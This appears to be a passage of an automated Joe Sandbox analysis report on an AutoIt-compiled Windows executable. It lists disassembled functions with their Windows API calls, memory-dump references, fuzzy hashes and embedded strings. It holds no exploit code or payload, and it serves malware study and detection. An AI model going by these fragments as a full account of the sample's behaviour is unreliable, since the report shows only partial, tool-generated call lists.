                                                          • GetDlgItem.USER32(?,000003EA), ref: 0039C311
                                                          • SetWindowTextW.USER32(00000000,?), ref: 0039C317
                                                          • GetDlgItem.USER32(?,000003E9), ref: 0039C327
                                                          • SetWindowTextW.USER32(00000000,?), ref: 0039C32D
                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0039C34E
                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0039C368
                                                          • GetWindowRect.USER32(?,?), ref: 0039C371
                                                          • SetWindowTextW.USER32(?,?), ref: 0039C3DC
                                                          • GetDesktopWindow.USER32 ref: 0039C3E2
                                                          • GetWindowRect.USER32(00000000), ref: 0039C3E9
                                                          • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0039C435
                                                          • GetClientRect.USER32(?,?), ref: 0039C442
                                                          • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0039C467
                                                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0039C492
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                          • String ID:
                                                          • API String ID: 3869813825-0
                                                          • Opcode ID: 0a5e2a2ae4199ad514dea82d0318af2973a8c71797ae13d8cd959b1d843299d6
                                                          • Instruction ID: ae1e2d29c9c49025a63a0c48c888e686f780ee10b53bedf133f78a3ba5962e5d
                                                          • Opcode Fuzzy Hash: 0a5e2a2ae4199ad514dea82d0318af2973a8c71797ae13d8cd959b1d843299d6
                                                          • Instruction Fuzzy Hash: 1A514B31900709AFDF22DFA8DD89F6EBBBAFF04704F004928E586A65A0C775B914CB50
                                                          Function 003B5113 Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 003B5129
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 003B5134
                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 003B513F
                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 003B514A
                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 003B5155
                                                          • LoadCursorW.USER32(00000000,00007F81), ref: 003B5160
                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 003B516B
                                                          • LoadCursorW.USER32(00000000,00007F80), ref: 003B5176
                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 003B5181
                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 003B518C
                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 003B5197
                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 003B51A2
                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 003B51AD
                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 003B51B8
                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 003B51C3
                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 003B51CE
                                                          • GetCursorInfo.USER32(?), ref: 003B51DE
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Cursor$Load$Info
                                                          • String ID:
                                                          • API String ID: 2577412497-0
                                                          • Opcode ID: 7371288ff4d2c40a4046073695488b9598fd021ebe8bf52e3ff7ad8d4822c01f
                                                          • Instruction ID: 0328a5b6a3585a53c5c716da79c20409f44d1dce05752965d5781d9a388db75f
                                                          • Opcode Fuzzy Hash: 7371288ff4d2c40a4046073695488b9598fd021ebe8bf52e3ff7ad8d4822c01f
                                                          • Instruction Fuzzy Hash: F73117B0D493196ADB119FB68C8999FBEECFF04754F50452AE50DEB280DA78A5008F91
                                                          Function 003CA1EB Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _memset.LIBCMT ref: 003CA28B
                                                          • DestroyWindow.USER32(?,?), ref: 003CA305
                                                            • Part of subcall function 00347D2C: _memmove.LIBCMT ref: 00347D66
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 003CA37F
                                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 003CA3A1
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003CA3B4
                                                          • DestroyWindow.USER32(00000000), ref: 003CA3D6
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00340000,00000000), ref: 003CA40D
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003CA426
                                                          • GetDesktopWindow.USER32 ref: 003CA43F
                                                          • GetWindowRect.USER32(00000000), ref: 003CA446
                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 003CA45E
                                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 003CA476
                                                            • Part of subcall function 003425DB: GetWindowLongW.USER32(?,000000EB), ref: 003425EC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                          • String ID: 0$tooltips_class32
                                                          • API String ID: 1297703922-3619404913
                                                          • Opcode ID: 08e5cd04fa562e4d14bf2643aa997f19c69ee1d2c545999c46148116fec52ab9
                                                          • Instruction ID: 746c5877c74201f191c7e1d337881d86be5c515beca42be32e6d77ae148296a6
                                                          • Opcode Fuzzy Hash: 08e5cd04fa562e4d14bf2643aa997f19c69ee1d2c545999c46148116fec52ab9
                                                          • Instruction Fuzzy Hash: B0719971150648AFDB26DF28DC48F667BE9EB88708F04452DF985DB2A0D770AD12CF26
                                                          Function 003C43FB Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?), ref: 003C448D
                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003C44D8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: BuffCharMessageSendUpper
                                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                          • API String ID: 3974292440-4258414348
                                                          • Opcode ID: f739bac449104774c1ff13d0ee927f4af661c0cd4902bd34402da30d235e9f4b
                                                          • Instruction ID: 572475ebad42a508bc5892b509aef3b2b56c7e5d53623d666ba28394f63fbe2e
                                                          • Opcode Fuzzy Hash: f739bac449104774c1ff13d0ee927f4af661c0cd4902bd34402da30d235e9f4b
                                                          • Instruction Fuzzy Hash: 83915B342047019BCB1AEF20C8A1B6AB7E5AF85310F15845DF8969F7A2CB31ED19CB81
                                                          Function 003CB832 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 003CB8E8
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,003C91F4), ref: 003CB944
                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003CB97D
                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 003CB9C0
                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003CB9F7
                                                          • FreeLibrary.KERNEL32(?), ref: 003CBA03
                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003CBA13
                                                          • DestroyIcon.USER32(?,?,?,?,?,003C91F4), ref: 003CBA22
                                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 003CBA3F
                                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 003CBA4B
                                                            • Part of subcall function 0036307D: __wcsicmp_l.LIBCMT ref: 00363106
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                          • String ID: .dll$.exe$.icl
                                                          • API String ID: 1212759294-1154884017
                                                          • Opcode ID: 7b8ef178a4923e5802c678400d0c011f1f29d47b4faef8b78fed021d44c88ba4
                                                          • Instruction ID: cc00cb949ac4cb5b2580a33ce40bd0e113a596abac0be22d4886c71011fa5ca5
                                                          • Opcode Fuzzy Hash: 7b8ef178a4923e5802c678400d0c011f1f29d47b4faef8b78fed021d44c88ba4
                                                          • Instruction Fuzzy Hash: 1F61DD71500608BEEB16DF64CC46FBAB7ACEB08710F10811AF915DA1C0DB74AE90CBA0
                                                          Function 003AA3DC Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00349997: __itow.LIBCMT ref: 003499C2
                                                            • Part of subcall function 00349997: __swprintf.LIBCMT ref: 00349A0C
                                                          • CharLowerBuffW.USER32(?,?), ref: 003AA455
                                                          • GetDriveTypeW.KERNEL32 ref: 003AA4A2
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003AA4EA
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003AA521
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003AA54F
                                                            • Part of subcall function 00347D2C: _memmove.LIBCMT ref: 00347D66
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                          • API String ID: 2698844021-4113822522
                                                          • Opcode ID: d5ae5724d457c24f0d4a8d0ecc84a1edc35f973a9bd83464b66fc2b4c3fddfd4
                                                          • Instruction ID: 532ec7fde03f894a50c83f54b04a21fdb7f2d1fcb6c2945a717e454c74f9aea4
                                                          • Opcode Fuzzy Hash: d5ae5724d457c24f0d4a8d0ecc84a1edc35f973a9bd83464b66fc2b4c3fddfd4
                                                          • Instruction Fuzzy Hash: 2A514A765047049FC706EF20C89196BB7E8FF89718F00896DF8969B261DB31EE09CB52
                                                          Function 0039FBDB Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0037E382,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0039FC10
                                                          • LoadStringW.USER32(00000000,?,0037E382,00000001), ref: 0039FC19
                                                            • Part of subcall function 00347F41: _memmove.LIBCMT ref: 00347F82
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,0037E382,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0039FC3B
                                                          • LoadStringW.USER32(00000000,?,0037E382,00000001), ref: 0039FC3E
                                                          • __swprintf.LIBCMT ref: 0039FC8E
                                                          • __swprintf.LIBCMT ref: 0039FC9F
                                                          • _wprintf.LIBCMT ref: 0039FD48
                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0039FD5F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                          • API String ID: 984253442-2268648507
                                                          • Opcode ID: f12d05aef4d00675e34053ef23628bc1c63367681a91f9ba7a2df0ac187299cd
                                                          • Instruction ID: 425db5103adf57f72f44746b8d50d4a32e9d9818be99f125d7f3fd311df33707
                                                          • Opcode Fuzzy Hash: f12d05aef4d00675e34053ef23628bc1c63367681a91f9ba7a2df0ac187299cd
                                                          • Instruction Fuzzy Hash: 7F410B72804219ABCF16FBE0DD86DEEB7B8AF14700F500165F505BA0A6DB316F59CBA1
                                                          Function 003CBA67 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,003C9239,?,?), ref: 003CBA8A
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,003C9239,?,?,00000000,?), ref: 003CBAA1
                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,003C9239,?,?,00000000,?), ref: 003CBAAC
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,003C9239,?,?,00000000,?), ref: 003CBAB9
                                                          • GlobalLock.KERNEL32(00000000), ref: 003CBAC2
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,003C9239,?,?,00000000,?), ref: 003CBAD1
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 003CBADA
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,003C9239,?,?,00000000,?), ref: 003CBAE1
                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,003C9239,?,?,00000000,?), ref: 003CBAF2
                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,003D2CAC,?), ref: 003CBB0B
                                                          • GlobalFree.KERNEL32(00000000), ref: 003CBB1B
                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 003CBB3F
                                                          • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 003CBB6A
                                                          • DeleteObject.GDI32(00000000), ref: 003CBB92
                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 003CBBA8
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                          • String ID:
                                                          • API String ID: 3840717409-0
                                                          • Opcode ID: 78f3dae36036702a7d6605aa74f8695ad0b6ed2e66f80fa9f9b0a0a48d813a49
                                                          • Instruction ID: b078c1136a3404fcb8a8fae2674faf6703f5a8d55dafed71db763ffb29b5f6c4
                                                          • Opcode Fuzzy Hash: 78f3dae36036702a7d6605aa74f8695ad0b6ed2e66f80fa9f9b0a0a48d813a49
                                                          • Instruction Fuzzy Hash: 29412779600209BFDB129F65DC89EAABBBDFF89711F104068F909D7260D730AD01DB60
                                                          Function 003AD925 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __wsplitpath.LIBCMT ref: 003ADA9C
                                                          • _wcscat.LIBCMT ref: 003ADAB4
                                                          • _wcscat.LIBCMT ref: 003ADAC6
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003ADADB
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 003ADAEF
                                                          • GetFileAttributesW.KERNEL32(?), ref: 003ADB07
                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 003ADB21
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 003ADB33
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                          • String ID: *.*
                                                          • API String ID: 34673085-438819550
                                                          • Opcode ID: 564db50a6c88d97cf47ee55efab9fd90a53378a24d5c87c8bb438b8399c7d6e0
                                                          • Instruction ID: 5b67ae43a9447c12e2691ca6133e6e3ee73b3c663a056cc63f390dc9e7978b45
                                                          • Opcode Fuzzy Hash: 564db50a6c88d97cf47ee55efab9fd90a53378a24d5c87c8bb438b8399c7d6e0
                                                          • Instruction Fuzzy Hash: 4B8182725082409FCB26DF64C84496BB7E8FF8A710F19882EF48ADB651D730ED44CB52
                                                          Function 003CC216 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00342612: GetWindowLongW.USER32(?,000000EB), ref: 00342623
                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 003CC266
                                                          • GetFocus.USER32 ref: 003CC276
                                                          • GetDlgCtrlID.USER32(00000000), ref: 003CC281
                                                          • _memset.LIBCMT ref: 003CC3AC
                                                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 003CC3D7
                                                          • GetMenuItemCount.USER32(?), ref: 003CC3F7
                                                          • GetMenuItemID.USER32(?,00000000), ref: 003CC40A
                                                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 003CC43E
                                                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 003CC486
                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003CC4BE
                                                          • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 003CC4F3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                          • String ID: 0
                                                          • API String ID: 1296962147-4108050209
                                                          • Opcode ID: 95bc0be6cd7887947ad18710e9bd9930975b3ba6eff56d8c7ad5d704f80aee8e
                                                          • Instruction ID: 7f9952285f2f69eac732dc988ee813b46762fd402462244f24f4e85423828911
                                                          • Opcode Fuzzy Hash: 95bc0be6cd7887947ad18710e9bd9930975b3ba6eff56d8c7ad5d704f80aee8e
                                                          • Instruction Fuzzy Hash: CA817A711183019FDB16DF15D894E6BBBE9EB88314F01992DF999E7291C731EC04CBA2
                                                          Function 003B742F Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDC.USER32(00000000), ref: 003B74A4
                                                          • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 003B74B0
                                                          • CreateCompatibleDC.GDI32(?), ref: 003B74BC
                                                          • SelectObject.GDI32(00000000,?), ref: 003B74C9
                                                          • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 003B751D
                                                          • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 003B7559
                                                          • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 003B757D
                                                          • SelectObject.GDI32(00000006,?), ref: 003B7585
                                                          • DeleteObject.GDI32(?), ref: 003B758E
                                                          • DeleteDC.GDI32(00000006), ref: 003B7595
                                                          • ReleaseDC.USER32(00000000,?), ref: 003B75A0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                          • String ID: (
                                                          • API String ID: 2598888154-3887548279
                                                          • Opcode ID: 363b25b63105b59f0518319422d80c7aa67c9d96a287af1c7770e301a03df96e
                                                          • Instruction ID: adc203771b1a696c3683d3d81f9bdd064c75c1f4d793b707de1474017cb97114
                                                          • Opcode Fuzzy Hash: 363b25b63105b59f0518319422d80c7aa67c9d96a287af1c7770e301a03df96e
                                                          • Instruction Fuzzy Hash: 21514D75904219EFCB26CFA9CC85EAEBBB9EF48710F14842DFA89D7611D731A940CB50
                                                          Function 00346BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00360AD7: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00346C6C,?,00008000), ref: 00360AF3
                                                            • Part of subcall function 003448AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003448A1,?,?,003437C0,?), ref: 003448CE
                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00346D0D
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00346E5A
                                                            • Part of subcall function 003459CD: _wcscpy.LIBCMT ref: 00345A05
                                                            • Part of subcall function 003637BD: _iswctype.LIBCMT ref: 003637C5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                          • API String ID: 537147316-1018226102
